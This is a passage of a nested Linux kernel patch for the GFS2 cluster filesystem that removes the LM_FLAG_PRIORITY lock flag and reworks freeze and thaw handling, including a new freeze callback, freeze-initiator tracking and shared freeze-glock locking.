++	lck_flags &= (LM_FLAG_TRY | LM_FLAG_TRY_1CB | LM_FLAG_NOEXP);
+ 	GLOCK_BUG_ON(gl, gl->gl_state == target);
+ 	GLOCK_BUG_ON(gl, gl->gl_state == gl->gl_target);
+ 	if ((target == LM_ST_UNLOCKED || target == LM_ST_DEFERRED) &&
+@@ -1528,27 +1526,20 @@ __acquires(&gl->gl_lockref.lock)
+ 		}
+ 		if (test_bit(HIF_HOLDER, &gh2->gh_iflags))
+ 			continue;
+-		if (unlikely((gh->gh_flags & LM_FLAG_PRIORITY) && !insert_pt))
+-			insert_pt = &gh2->gh_list;
+ 	}
+ 	trace_gfs2_glock_queue(gh, 1);
+ 	gfs2_glstats_inc(gl, GFS2_LKS_QCOUNT);
+ 	gfs2_sbstats_inc(gl, GFS2_LKS_QCOUNT);
+ 	if (likely(insert_pt == NULL)) {
+ 		list_add_tail(&gh->gh_list, &gl->gl_holders);
+-		if (unlikely(gh->gh_flags & LM_FLAG_PRIORITY))
+-			goto do_cancel;
+ 		return;
+ 	}
+ 	list_add_tail(&gh->gh_list, insert_pt);
+-do_cancel:
+ 	gh = list_first_entry(&gl->gl_holders, struct gfs2_holder, gh_list);
+-	if (!(gh->gh_flags & LM_FLAG_PRIORITY)) {
+-		spin_unlock(&gl->gl_lockref.lock);
+-		if (sdp->sd_lockstruct.ls_ops->lm_cancel)
+-			sdp->sd_lockstruct.ls_ops->lm_cancel(gl);
+-		spin_lock(&gl->gl_lockref.lock);
+-	}
++	spin_unlock(&gl->gl_lockref.lock);
++	if (sdp->sd_lockstruct.ls_ops->lm_cancel)
++		sdp->sd_lockstruct.ls_ops->lm_cancel(gl);
++	spin_lock(&gl->gl_lockref.lock);
+ 	return;
+ 
+ trap_recursive:
+@@ -2296,8 +2287,6 @@ static const char *hflags2str(char *buf, u16 flags, unsigned long iflags)
+ 		*p++ = 'e';
+ 	if (flags & LM_FLAG_ANY)
+ 		*p++ = 'A';
+-	if (flags & LM_FLAG_PRIORITY)
+-		*p++ = 'p';
+ 	if (flags & LM_FLAG_NODE_SCOPE)
+ 		*p++ = 'n';
+ 	if (flags & GL_ASYNC)
+diff --git a/fs/gfs2/glock.h b/fs/gfs2/glock.h
+index 0d068f4fd7d67..f6dd94ce74998 100644
+--- a/fs/gfs2/glock.h
++++ b/fs/gfs2/glock.h
+@@ -68,14 +68,6 @@ enum {
+  * also be granted in SHARED.  The preferred state is whichever is compatible
+  * with other granted locks, or the specified state if no other locks exist.
+  *
+- * LM_FLAG_PRIORITY
+- * Override fairness considerations.  Suppose a lock is held in a shared state
+- * and there is a pending request for the deferred state.  A shared lock
+- * request with the priority flag would be allowed to bypass the deferred
+- * request and directly join the other shared lock.  A shared lock request
+- * without the priority flag might be forced to wait until the deferred
+- * requested had acquired and released the lock.
+- *
+  * LM_FLAG_NODE_SCOPE
+  * This holder agrees to share the lock within this node. In other words,
+  * the glock is held in EX mode according to DLM, but local holders on the
+@@ -86,7 +78,6 @@ enum {
+ #define LM_FLAG_TRY_1CB		0x0002
+ #define LM_FLAG_NOEXP		0x0004
+ #define LM_FLAG_ANY		0x0008
+-#define LM_FLAG_PRIORITY	0x0010
+ #define LM_FLAG_NODE_SCOPE	0x0020
+ #define GL_ASYNC		0x0040
+ #define GL_EXACT		0x0080
+diff --git a/fs/gfs2/glops.c b/fs/gfs2/glops.c
+index 91a542b9d81e8..bb5bc32a5eea5 100644
+--- a/fs/gfs2/glops.c
++++ b/fs/gfs2/glops.c
+@@ -555,47 +555,34 @@ static void inode_go_dump(struct seq_file *seq, struct gfs2_glock *gl,
+ }
+ 
+ /**
+- * freeze_go_sync - promote/demote the freeze glock
++ * freeze_go_callback - A cluster node is requesting a freeze
+  * @gl: the glock
++ * @remote: true if this came from a different cluster node
+  */
+ 
+-static int freeze_go_sync(struct gfs2_glock *gl)
++static void freeze_go_callback(struct gfs2_glock *gl, bool remote)
+ {
+-	int error = 0;
+ 	struct gfs2_sbd *sdp = gl->gl_name.ln_sbd;
++	struct super_block *sb = sdp->sd_vfs;
++
++	if (!remote ||
++	    (gl->gl_state != LM_ST_SHARED &&
++	     gl->gl_state != LM_ST_UNLOCKED) ||
++	    gl->gl_demote_state != LM_ST_UNLOCKED)
++		return;
+ 
+ 	/*
+-	 * We need to check gl_state == LM_ST_SHARED here and not gl_req ==
+-	 * LM_ST_EXCLUSIVE. That's because when any node does a freeze,
+-	 * all the nodes should have the freeze glock in SH mode and they all
+-	 * call do_xmote: One for EX and the others for UN. They ALL must
+-	 * freeze locally, and they ALL must queue freeze work. The freeze_work
+-	 * calls freeze_func, which tries to reacquire the freeze glock in SH,
+-	 * effectively waiting for the thaw on the node who holds it in EX.
+-	 * Once thawed, the work func acquires the freeze glock in
+-	 * SH and everybody goes back to thawed.
++	 * Try to get an active super block reference to prevent racing with
++	 * unmount (see super_trylock_shared()).  But note that unmount isn't
++	 * the only place where a write lock on s_umount is taken, and we can
++	 * fail here because of things like remount as well.
+ 	 */
+-	if (gl->gl_state == LM_ST_SHARED && !gfs2_withdrawn(sdp) &&
+-	    !test_bit(SDF_NORECOVERY, &sdp->sd_flags)) {
+-		atomic_set(&sdp->sd_freeze_state, SFS_STARTING_FREEZE);
+-		error = freeze_super(sdp->sd_vfs);
+-		if (error) {
+-			fs_info(sdp, "GFS2: couldn't freeze filesystem: %d\n",
+-				error);
+-			if (gfs2_withdrawn(sdp)) {
+-				atomic_set(&sdp->sd_freeze_state, SFS_UNFROZEN);
+-				return 0;
+-			}
+-			gfs2_assert_withdraw(sdp, 0);
+-		}
+-		queue_work(gfs2_freeze_wq, &sdp->sd_freeze_work);
+-		if (test_bit(SDF_JOURNAL_LIVE, &sdp->sd_flags))
+-			gfs2_log_flush(sdp, NULL, GFS2_LOG_HEAD_FLUSH_FREEZE |
+-				       GFS2_LFC_FREEZE_GO_SYNC);
+-		else /* read-only mounts */
+-			atomic_set(&sdp->sd_freeze_state, SFS_FROZEN);
++	if (down_read_trylock(&sb->s_umount)) {
++		atomic_inc(&sb->s_active);
++		up_read(&sb->s_umount);
++		if (!queue_work(gfs2_freeze_wq, &sdp->sd_freeze_work))
++			deactivate_super(sb);
+ 	}
+-	return 0;
+ }
+ 
+ /**
+@@ -625,18 +612,6 @@ static int freeze_go_xmote_bh(struct gfs2_glock *gl)
+ 	return 0;
+ }
+ 
+-/**
+- * freeze_go_demote_ok
+- * @gl: the glock
+- *
+- * Always returns 0
+- */
+-
+-static int freeze_go_demote_ok(const struct gfs2_glock *gl)
+-{
+-	return 0;
+-}
+-
+ /**
+  * iopen_go_callback - schedule the dcache entry for the inode to be deleted
+  * @gl: the glock
+@@ -760,9 +735,8 @@ const struct gfs2_glock_operations gfs2_rgrp_glops = {
+ };
+ 
+ const struct gfs2_glock_operations gfs2_freeze_glops = {
+-	.go_sync = freeze_go_sync,
+ 	.go_xmote_bh = freeze_go_xmote_bh,
+-	.go_demote_ok = freeze_go_demote_ok,
++	.go_callback = freeze_go_callback,
+ 	.go_type = LM_TYPE_NONDISK,
+ 	.go_flags = GLOF_NONDISK,
+ };
+diff --git a/fs/gfs2/incore.h b/fs/gfs2/incore.h
+index d09d9892cd055..113aeb5877027 100644
+--- a/fs/gfs2/incore.h
++++ b/fs/gfs2/incore.h
+@@ -600,7 +600,7 @@ enum {
+ 	SDF_RORECOVERY		= 7, /* read only recovery */
+ 	SDF_SKIP_DLM_UNLOCK	= 8,
+ 	SDF_FORCE_AIL_FLUSH     = 9,
+-	SDF_FS_FROZEN           = 10,
++	SDF_FREEZE_INITIATOR	= 10,
+ 	SDF_WITHDRAWING		= 11, /* Will withdraw eventually */
+ 	SDF_WITHDRAW_IN_PROG	= 12, /* Withdraw is in progress */
+ 	SDF_REMOTE_WITHDRAW	= 13, /* Performing remote recovery */
+diff --git a/fs/gfs2/inode.c b/fs/gfs2/inode.c
+index 23e6962cdd6e3..04fc3e72a96e4 100644
+--- a/fs/gfs2/inode.c
++++ b/fs/gfs2/inode.c
+@@ -1907,7 +1907,7 @@ static int setattr_chown(struct inode *inode, struct iattr *attr)
+ 	kuid_t ouid, nuid;
+ 	kgid_t ogid, ngid;
+ 	int error;
+-	struct gfs2_alloc_parms ap;
++	struct gfs2_alloc_parms ap = {};
+ 
+ 	ouid = inode->i_uid;
+ 	ogid = inode->i_gid;
+diff --git a/fs/gfs2/lock_dlm.c b/fs/gfs2/lock_dlm.c
+index 71911bf9ab34e..884081730f9fe 100644
+--- a/fs/gfs2/lock_dlm.c
++++ b/fs/gfs2/lock_dlm.c
+@@ -222,11 +222,6 @@ static u32 make_flags(struct gfs2_glock *gl, const unsigned int gfs_flags,
+ 		lkf |= DLM_LKF_NOQUEUEBAST;
+ 	}
+ 
+-	if (gfs_flags & LM_FLAG_PRIORITY) {
+-		lkf |= DLM_LKF_NOORDER;
+-		lkf |= DLM_LKF_HEADQUE;
+-	}
+-
+ 	if (gfs_flags & LM_FLAG_ANY) {
+ 		if (req == DLM_LOCK_PR)
+ 			lkf |= DLM_LKF_ALTCW;
+diff --git a/fs/gfs2/log.c b/fs/gfs2/log.c
+index e021d5f50c231..8fd8bb8604869 100644
+--- a/fs/gfs2/log.c
++++ b/fs/gfs2/log.c
+@@ -1136,8 +1136,6 @@ void gfs2_log_flush(struct gfs2_sbd *sdp, struct gfs2_glock *gl, u32 flags)
+ 		if (flags & (GFS2_LOG_HEAD_FLUSH_SHUTDOWN |
+ 			     GFS2_LOG_HEAD_FLUSH_FREEZE))
+ 			gfs2_log_shutdown(sdp);
+-		if (flags & GFS2_LOG_HEAD_FLUSH_FREEZE)
+-			atomic_set(&sdp->sd_freeze_state, SFS_FROZEN);
+ 	}
+ 
+ out_end:
+diff --git a/fs/gfs2/ops_fstype.c b/fs/gfs2/ops_fstype.c
+index c0cf1d2d0ef5b..26a70b9676d53 100644
+--- a/fs/gfs2/ops_fstype.c
++++ b/fs/gfs2/ops_fstype.c
+@@ -434,7 +434,7 @@ static int init_locking(struct gfs2_sbd *sdp, struct gfs2_holder *mount_gh,
+ 	error = gfs2_glock_get(sdp, GFS2_FREEZE_LOCK, &gfs2_freeze_glops,
+ 			       CREATE, &sdp->sd_freeze_gl);
+ 	if (error) {
+-		fs_err(sdp, "can't create transaction glock: %d\n", error);
++		fs_err(sdp, "can't create freeze glock: %d\n", error);
+ 		goto fail_rename;
+ 	}
+ 
+@@ -1143,7 +1143,6 @@ static int gfs2_fill_super(struct super_block *sb, struct fs_context *fc)
+ 	int silent = fc->sb_flags & SB_SILENT;
+ 	struct gfs2_sbd *sdp;
+ 	struct gfs2_holder mount_gh;
+-	struct gfs2_holder freeze_gh;
+ 	int error;
+ 
+ 	sdp = init_sbd(sb);
+@@ -1260,21 +1259,19 @@ static int gfs2_fill_super(struct super_block *sb, struct fs_context *fc)
+ 
+ 	if (!sb_rdonly(sb)) {
+ 		error = init_threads(sdp);
+-		if (error) {
+-			gfs2_withdraw_delayed(sdp);
++		if (error)
+ 			goto fail_per_node;
+-		}
+ 	}
+ 
+-	error = gfs2_freeze_lock(sdp, &freeze_gh, 0);
++	error = gfs2_freeze_lock_shared(sdp, &sdp->sd_freeze_gh, 0);
+ 	if (error)
+ 		goto fail_per_node;
+ 
+ 	if (!sb_rdonly(sb))
+ 		error = gfs2_make_fs_rw(sdp);
+ 
+-	gfs2_freeze_unlock(&freeze_gh);
+ 	if (error) {
++		gfs2_freeze_unlock(&sdp->sd_freeze_gh);
+ 		if (sdp->sd_quotad_process)
+ 			kthread_stop(sdp->sd_quotad_process);
+ 		sdp->sd_quotad_process = NULL;
+@@ -1587,7 +1584,7 @@ static int gfs2_reconfigure(struct fs_context *fc)
+ 	if ((sb->s_flags ^ fc->sb_flags) & SB_RDONLY) {
+ 		struct gfs2_holder freeze_gh;
+ 
+-		error = gfs2_freeze_lock(sdp, &freeze_gh, 0);
++		error = gfs2_freeze_lock_shared(sdp, &freeze_gh, 0);
+ 		if (error)
+ 			return -EINVAL;
+ 
+diff --git a/fs/gfs2/recovery.c b/fs/gfs2/recovery.c
+index 2bb085a72e8ee..afeda936e2beb 100644
+--- a/fs/gfs2/recovery.c
++++ b/fs/gfs2/recovery.c
+@@ -404,7 +404,7 @@ void gfs2_recover_func(struct work_struct *work)
+ 	struct gfs2_inode *ip = GFS2_I(jd->jd_inode);
+ 	struct gfs2_sbd *sdp = GFS2_SB(jd->jd_inode);
+ 	struct gfs2_log_header_host head;
+-	struct gfs2_holder j_gh, ji_gh, thaw_gh;
++	struct gfs2_holder j_gh, ji_gh;
+ 	ktime_t t_start, t_jlck, t_jhd, t_tlck, t_rep;
+ 	int ro = 0;
+ 	unsigned int pass;
+@@ -420,10 +420,10 @@ void gfs2_recover_func(struct work_struct *work)
+ 	if (sdp->sd_args.ar_spectator)
+ 		goto fail;
+ 	if (jd->jd_jid != sdp->sd_lockstruct.ls_jid) {
+-		fs_info(sdp, "jid=%u: Trying to acquire journal lock...\n",
++		fs_info(sdp, "jid=%u: Trying to acquire journal glock...\n",
+ 			jd->jd_jid);
+ 		jlocked = 1;
+-		/* Acquire the journal lock so we can do recovery */
++		/* Acquire the journal glock so we can do recovery */
+ 
+ 		error = gfs2_glock_nq_num(sdp, jd->jd_jid, &gfs2_journal_glops,
+ 					  LM_ST_EXCLUSIVE,
+@@ -465,14 +465,14 @@ void gfs2_recover_func(struct work_struct *work)
+ 		ktime_ms_delta(t_jhd, t_jlck));
+ 
+ 	if (!(head.lh_flags & GFS2_LOG_HEAD_UNMOUNT)) {
+-		fs_info(sdp, "jid=%u: Acquiring the transaction lock...\n",
+-			jd->jd_jid);
+-
+-		/* Acquire a shared hold on the freeze lock */
++		mutex_lock(&sdp->sd_freeze_mutex);
+ 
+-		error = gfs2_freeze_lock(sdp, &thaw_gh, LM_FLAG_PRIORITY);
+-		if (error)
++		if (atomic_read(&sdp->sd_freeze_state) != SFS_UNFROZEN) {
++			mutex_unlock(&sdp->sd_freeze_mutex);
++			fs_warn(sdp, "jid=%u: Can't replay: filesystem "
++				"is frozen\n", jd->jd_jid);
+ 			goto fail_gunlock_ji;
++		}
+ 
+ 		if (test_bit(SDF_RORECOVERY, &sdp->sd_flags)) {
+ 			ro = 1;
+@@ -496,7 +496,7 @@ void gfs2_recover_func(struct work_struct *work)
+ 			fs_warn(sdp, "jid=%u: Can't replay: read-only block "
+ 				"device\n", jd->jd_jid);
+ 			error = -EROFS;
+-			goto fail_gunlock_thaw;
++			goto fail_gunlock_nofreeze;
+ 		}
+ 
+ 		t_tlck = ktime_get();
+@@ -514,7 +514,7 @@ void gfs2_recover_func(struct work_struct *work)
+ 			lops_after_scan(jd, error, pass);
+ 			if (error) {
+ 				up_read(&sdp->sd_log_flush_lock);
+-				goto fail_gunlock_thaw;
++				goto fail_gunlock_nofreeze;
+ 			}
+ 		}
+ 
+@@ -522,7 +522,7 @@ void gfs2_recover_func(struct work_struct *work)
+ 		clean_journal(jd, &head);
+ 		up_read(&sdp->sd_log_flush_lock);
+ 
+-		gfs2_freeze_unlock(&thaw_gh);
++		mutex_unlock(&sdp->sd_freeze_mutex);
+ 		t_rep = ktime_get();
+ 		fs_info(sdp, "jid=%u: Journal replayed in %lldms [jlck:%lldms, "
+ 			"jhead:%lldms, tlck:%lldms, replay:%lldms]\n",
+@@ -543,8 +543,8 @@ void gfs2_recover_func(struct work_struct *work)
+ 	fs_info(sdp, "jid=%u: Done\n", jd->jd_jid);
+ 	goto done;
+ 
+-fail_gunlock_thaw:
+-	gfs2_freeze_unlock(&thaw_gh);
++fail_gunlock_nofreeze:
++	mutex_unlock(&sdp->sd_freeze_mutex);
+ fail_gunlock_ji:
+ 	if (jlocked) {
+ 		gfs2_glock_dq_uninit(&ji_gh);
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index 6107cd680176c..aff8cdc61eff7 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -332,7 +332,12 @@ static int gfs2_lock_fs_check_clean(struct gfs2_sbd *sdp)
+ 	struct lfcc *lfcc;
+ 	LIST_HEAD(list);
+ 	struct gfs2_log_header_host lh;
+-	int error;
++	int error, error2;
++
++	/*
++	 * Grab all the journal glocks in SH mode.  We are *probably* doing
++	 * that to prevent recovery.
++	 */
+ 
+ 	list_for_each_entry(jd, &sdp->sd_jindex_list, jd_list) {
+ 		lfcc = kmalloc(sizeof(struct lfcc), GFP_KERNEL);
+@@ -349,11 +354,13 @@ static int gfs2_lock_fs_check_clean(struct gfs2_sbd *sdp)
+ 		list_add(&lfcc->list, &list);
+ 	}
+ 
++	gfs2_freeze_unlock(&sdp->sd_freeze_gh);
++
+ 	error = gfs2_glock_nq_init(sdp->sd_freeze_gl, LM_ST_EXCLUSIVE,
+ 				   LM_FLAG_NOEXP | GL_NOPID,
+ 				   &sdp->sd_freeze_gh);
+ 	if (error)
+-		goto out;
++		goto relock_shared;
+ 
+ 	list_for_each_entry(jd, &sdp->sd_jindex_list, jd_list) {
+ 		error = gfs2_jdesc_check(jd);
+@@ -368,8 +375,14 @@ static int gfs2_lock_fs_check_clean(struct gfs2_sbd *sdp)
+ 		}
+ 	}
+ 
+-	if (error)
+-		gfs2_freeze_unlock(&sdp->sd_freeze_gh);
++	if (!error)
++		goto out;  /* success */
++
++	gfs2_freeze_unlock(&sdp->sd_freeze_gh);
++
++relock_shared:
++	error2 = gfs2_freeze_lock_shared(sdp, &sdp->sd_freeze_gh, 0);
++	gfs2_assert_withdraw(sdp, !error2);
+ 
+ out:
+ 	while (!list_empty(&list)) {
+@@ -463,7 +476,7 @@ static int gfs2_write_inode(struct inode *inode, struct writeback_control *wbc)
+  * @flags: The type of dirty
+  *
+  * Unfortunately it can be called under any combination of inode
+- * glock and transaction lock, so we have to check carefully.
++ * glock and freeze glock, so we have to check carefully.
+  *
+  * At the moment this deals only with atime - it should be possible
+  * to expand that role in future, once a review of the locking has
+@@ -550,15 +563,8 @@ void gfs2_make_fs_ro(struct gfs2_sbd *sdp)
+ 				   gfs2_log_is_empty(sdp),
+ 				   HZ * 5);
+ 		gfs2_assert_warn(sdp, gfs2_log_is_empty(sdp));
+-	} else {
+-		wait_event_timeout(sdp->sd_log_waitq,
+-				   gfs2_log_is_empty(sdp),
+-				   HZ * 5);
+ 	}
+ 	gfs2_quota_cleanup(sdp);
+-
+-	if (!log_write_allowed)
+-		sdp->sd_vfs->s_flags |= SB_RDONLY;
+ }
+ 
+ /**
+@@ -594,12 +600,16 @@ static void gfs2_put_super(struct super_block *sb)
+ 	} else {
+ 		gfs2_quota_cleanup(sdp);
+ 	}
++	if (gfs2_withdrawn(sdp))
++		gfs2_quota_cleanup(sdp);
+ 	WARN_ON(gfs2_withdrawing(sdp));
+ 
+ 	/*  At this point, we're through modifying the disk  */
+ 
+ 	/*  Release stuff  */
+ 
++	gfs2_freeze_unlock(&sdp->sd_freeze_gh);
++
+ 	iput(sdp->sd_jindex);
+ 	iput(sdp->sd_statfs_inode);
+ 	iput(sdp->sd_rindex);
+@@ -654,59 +664,116 @@ static int gfs2_sync_fs(struct super_block *sb, int wait)
+ 	return sdp->sd_log_error;
+ }
+ 
+-void gfs2_freeze_func(struct work_struct *work)
++static int gfs2_freeze_locally(struct gfs2_sbd *sdp)
+ {
+-	int error;
+-	struct gfs2_holder freeze_gh;
+-	struct gfs2_sbd *sdp = container_of(work, struct gfs2_sbd, sd_freeze_work);
+ 	struct super_block *sb = sdp->sd_vfs;
++	int error;
+ 
+-	atomic_inc(&sb->s_active);
+-	error = gfs2_freeze_lock(sdp, &freeze_gh, 0);
+-	if (error) {
+-		gfs2_assert_withdraw(sdp, 0);
+-	} else {
+-		atomic_set(&sdp->sd_freeze_state, SFS_UNFROZEN);
+-		error = thaw_super(sb);
+-		if (error) {
+-			fs_info(sdp, "GFS2: couldn't thaw filesystem: %d\n",
+-				error);
+-			gfs2_assert_withdraw(sdp, 0);
++	atomic_set(&sdp->sd_freeze_state, SFS_STARTING_FREEZE);
++
++	error = freeze_super(sb);
++	if (error)
++		goto fail;
++
++	if (test_bit(SDF_JOURNAL_LIVE, &sdp->sd_flags)) {
++		gfs2_log_flush(sdp, NULL, GFS2_LOG_HEAD_FLUSH_FREEZE |
++			       GFS2_LFC_FREEZE_GO_SYNC);
++		if (gfs2_withdrawn(sdp)) {
++			thaw_super(sb);
++			error = -EIO;
++			goto fail;
+ 		}
+-		gfs2_freeze_unlock(&freeze_gh);
+ 	}
++	return 0;
++
++fail:
++	atomic_set(&sdp->sd_freeze_state, SFS_UNFROZEN);
++	return error;
++}
++
++static int gfs2_do_thaw(struct gfs2_sbd *sdp)
++{
++	struct super_block *sb = sdp->sd_vfs;
++	int error;
++
++	error = gfs2_freeze_lock_shared(sdp, &sdp->sd_freeze_gh, 0);
++	if (error)
++		goto fail;
++	error = thaw_super(sb);
++	if (!error)
++		return 0;
++
++fail:
++	fs_info(sdp, "GFS2: couldn't thaw filesystem: %d\n", error);
++	gfs2_assert_withdraw(sdp, 0);
++	return error;
++}
++
++void gfs2_freeze_func(struct work_struct *work)
++{
++	struct gfs2_sbd *sdp = container_of(work, struct gfs2_sbd, sd_freeze_work);
++	struct super_block *sb = sdp->sd_vfs;
++	int error;
++
++	mutex_lock(&sdp->sd_freeze_mutex);
++	error = -EBUSY;
++	if (atomic_read(&sdp->sd_freeze_state) != SFS_UNFROZEN)
++		goto freeze_failed;
++
++	error = gfs2_freeze_locally(sdp);
++	if (error)
++		goto freeze_failed;
++
++	gfs2_freeze_unlock(&sdp->sd_freeze_gh);
++	atomic_set(&sdp->sd_freeze_state, SFS_FROZEN);
++
++	error = gfs2_do_thaw(sdp);
++	if (error)
++		goto out;
++
++	atomic_set(&sdp->sd_freeze_state, SFS_UNFROZEN);
++	goto out;
++
++freeze_failed:
++	fs_info(sdp, "GFS2: couldn't freeze filesystem: %d\n", error);
++
++out:
++	mutex_unlock(&sdp->sd_freeze_mutex);
+ 	deactivate_super(sb);
+-	clear_bit_unlock(SDF_FS_FROZEN, &sdp->sd_flags);
+-	wake_up_bit(&sdp->sd_flags, SDF_FS_FROZEN);
+-	return;
+ }
+ 
+ /**
+- * gfs2_freeze - prevent further writes to the filesystem
++ * gfs2_freeze_super - prevent further writes to the filesystem
+  * @sb: the VFS structure for the filesystem
+  *
+  */
+ 
+-static int gfs2_freeze(struct super_block *sb)
++static int gfs2_freeze_super(struct super_block *sb)
+ {
+ 	struct gfs2_sbd *sdp = sb->s_fs_info;
+ 	int error;
+ 
+-	mutex_lock(&sdp->sd_freeze_mutex);
+-	if (atomic_read(&sdp->sd_freeze_state) != SFS_UNFROZEN) {
+-		error = -EBUSY;
++	if (!mutex_trylock(&sdp->sd_freeze_mutex))
++		return -EBUSY;
++	error = -EBUSY;
++	if (atomic_read(&sdp->sd_freeze_state) != SFS_UNFROZEN)
+ 		goto out;
+-	}
+ 
+ 	for (;;) {
+-		if (gfs2_withdrawn(sdp)) {
+-			error = -EINVAL;
++		error = gfs2_freeze_locally(sdp);
++		if (error) {
++			fs_info(sdp, "GFS2: couldn't freeze filesystem: %d\n",
++				error);
+ 			goto out;
+ 		}
+ 
+ 		error = gfs2_lock_fs_check_clean(sdp);
+ 		if (!error)
+-			break;
++			break;  /* success */
++
++		error = gfs2_do_thaw(sdp);
++		if (error)
++			goto out;
+ 
+ 		if (error == -EBUSY)
+ 			fs_err(sdp, "waiting for recovery before freeze\n");
+@@ -720,32 +787,60 @@ static int gfs2_freeze(struct super_block *sb)
+ 		fs_err(sdp, "retrying...\n");
+ 		msleep(1000);
+ 	}
+-	set_bit(SDF_FS_FROZEN, &sdp->sd_flags);
++
+ out:
++	if (!error) {
++		set_bit(SDF_FREEZE_INITIATOR, &sdp->sd_flags);
++		atomic_set(&sdp->sd_freeze_state, SFS_FROZEN);
++	}
+ 	mutex_unlock(&sdp->sd_freeze_mutex);
+ 	return error;
+ }
+ 
+ /**
+- * gfs2_unfreeze - reallow writes to the filesystem
++ * gfs2_thaw_super - reallow writes to the filesystem
+  * @sb: the VFS structure for the filesystem
+  *
+  */
+ 
+-static int gfs2_unfreeze(struct super_block *sb)
++static int gfs2_thaw_super(struct super_block *sb)
+ {
+ 	struct gfs2_sbd *sdp = sb->s_fs_info;
++	int error;
+ 
+-	mutex_lock(&sdp->sd_freeze_mutex);
+-	if (atomic_read(&sdp->sd_freeze_state) != SFS_FROZEN ||
+-	    !gfs2_holder_initialized(&sdp->sd_freeze_gh)) {
+-		mutex_unlock(&sdp->sd_freeze_mutex);
+-		return -EINVAL;
++	if (!mutex_trylock(&sdp->sd_freeze_mutex))
++		return -EBUSY;
++	error = -EINVAL;
++	if (!test_bit(SDF_FREEZE_INITIATOR, &sdp->sd_flags))
++		goto out;
++
++	atomic_inc(&sb->s_active);
++	gfs2_freeze_unlock(&sdp->sd_freeze_gh);
++
++	error = gfs2_do_thaw(sdp);
++
++	if (!error) {
++		clear_bit(SDF_FREEZE_INITIATOR, &sdp->sd_flags);
++		atomic_set(&sdp->sd_freeze_state, SFS_UNFROZEN);
+ 	}
++out:
++	mutex_unlock(&sdp->sd_freeze_mutex);
++	deactivate_super(sb);
++	return error;
++}
++
++void gfs2_thaw_freeze_initiator(struct super_block *sb)
++{
++	struct gfs2_sbd *sdp = sb->s_fs_info;
++
++	mutex_lock(&sdp->sd_freeze_mutex);
++	if (!test_bit(SDF_FREEZE_INITIATOR, &sdp->sd_flags))
++		goto out;
+ 
+ 	gfs2_freeze_unlock(&sdp->sd_freeze_gh);
++
++out:
+ 	mutex_unlock(&sdp->sd_freeze_mutex);
+-	return wait_on_bit(&sdp->sd_flags, SDF_FS_FROZEN, TASK_INTERRUPTIBLE);
+ }
+ 
+ /**
+@@ -1499,8 +1594,8 @@ const struct super_operations gfs2_super_ops = {
+ 	.evict_inode		= gfs2_evict_inode,
+ 	.put_super		= gfs2_put_super,
+ 	.sync_fs		= gfs2_sync_fs,
+-	.freeze_super		= gfs2_freeze,
+-	.thaw_super		= gfs2_unfreeze,
++	.freeze_super		= gfs2_freeze_super,
++	.thaw_super		= gfs2_thaw_super,
+ 	.statfs			= gfs2_statfs,
+ 	.drop_inode		= gfs2_drop_inode,
+ 	.show_options		= gfs2_show_options,
+diff --git a/fs/gfs2/super.h b/fs/gfs2/super.h
+index 58d13fd77aed5..bba58629bc458 100644
+--- a/fs/gfs2/super.h
++++ b/fs/gfs2/super.h
+@@ -46,6 +46,7 @@ extern void gfs2_statfs_change_out(const struct gfs2_statfs_change_host *sc,
+ extern void update_statfs(struct gfs2_sbd *sdp, struct buffer_head *m_bh);
+ extern int gfs2_statfs_sync(struct super_block *sb, int type);
+ extern void gfs2_freeze_func(struct work_struct *work);
++extern void gfs2_thaw_freeze_initiator(struct super_block *sb);
+ 
+ extern void free_local_statfs_inodes(struct gfs2_sbd *sdp);
+ extern struct inode *find_local_statfs_inode(struct gfs2_sbd *sdp,
+diff --git a/fs/gfs2/sys.c b/fs/gfs2/sys.c
+index d87ea98cf5350..e1fa76d4a7c22 100644
+--- a/fs/gfs2/sys.c
++++ b/fs/gfs2/sys.c
+@@ -110,7 +110,7 @@ static ssize_t status_show(struct gfs2_sbd *sdp, char *buf)
+ 		     test_bit(SDF_RORECOVERY, &f),
+ 		     test_bit(SDF_SKIP_DLM_UNLOCK, &f),
+ 		     test_bit(SDF_FORCE_AIL_FLUSH, &f),
+-		     test_bit(SDF_FS_FROZEN, &f),
++		     test_bit(SDF_FREEZE_INITIATOR, &f),
+ 		     test_bit(SDF_WITHDRAWING, &f),
+ 		     test_bit(SDF_WITHDRAW_IN_PROG, &f),
+ 		     test_bit(SDF_REMOTE_WITHDRAW, &f),
+diff --git a/fs/gfs2/util.c b/fs/gfs2/util.c
+index 48c69aa60cd17..30b8821c54ad4 100644
+--- a/fs/gfs2/util.c
++++ b/fs/gfs2/util.c
+@@ -9,6 +9,7 @@
+ #include <linux/spinlock.h>
+ #include <linux/completion.h>
+ #include <linux/buffer_head.h>
++#include <linux/kthread.h>
+ #include <linux/crc32.h>
+ #include <linux/gfs2_ondisk.h>
+ #include <linux/delay.h>
+@@ -93,13 +94,13 @@ int check_journal_clean(struct gfs2_sbd *sdp, struct gfs2_jdesc *jd,
+ }
+ 
+ /**
+- * gfs2_freeze_lock - hold the freeze glock
++ * gfs2_freeze_lock_shared - hold the freeze glock
+  * @sdp: the superblock
+  * @freeze_gh: pointer to the requested holder
+  * @caller_flags: any additional flags needed by the caller
+  */
+-int gfs2_freeze_lock(struct gfs2_sbd *sdp, struct gfs2_holder *freeze_gh,
+-		     int caller_flags)
++int gfs2_freeze_lock_shared(struct gfs2_sbd *sdp, struct gfs2_holder *freeze_gh,
++			    int caller_flags)
+ {
+ 	int flags = LM_FLAG_NOEXP | GL_EXACT | caller_flags;
+ 	int error;
+@@ -107,7 +108,7 @@ int gfs2_freeze_lock(struct gfs2_sbd *sdp, struct gfs2_holder *freeze_gh,
+ 	error = gfs2_glock_nq_init(sdp->sd_freeze_gl, LM_ST_SHARED, flags,
+ 				   freeze_gh);
+ 	if (error && error != GLR_TRYFAILED)
+-		fs_err(sdp, "can't lock the freeze lock: %d\n", error);
++		fs_err(sdp, "can't lock the freeze glock: %d\n", error);
+ 	return error;
+ }
+ 
+@@ -124,7 +125,6 @@ static void signal_our_withdraw(struct gfs2_sbd *sdp)
+ 	struct gfs2_inode *ip;
+ 	struct gfs2_glock *i_gl;
+ 	u64 no_formal_ino;
+-	int log_write_allowed = test_bit(SDF_JOURNAL_LIVE, &sdp->sd_flags);
+ 	int ret = 0;
+ 	int tries;
+ 
+@@ -152,24 +152,34 @@ static void signal_our_withdraw(struct gfs2_sbd *sdp)
+ 	 */
+ 	clear_bit(SDF_JOURNAL_LIVE, &sdp->sd_flags);
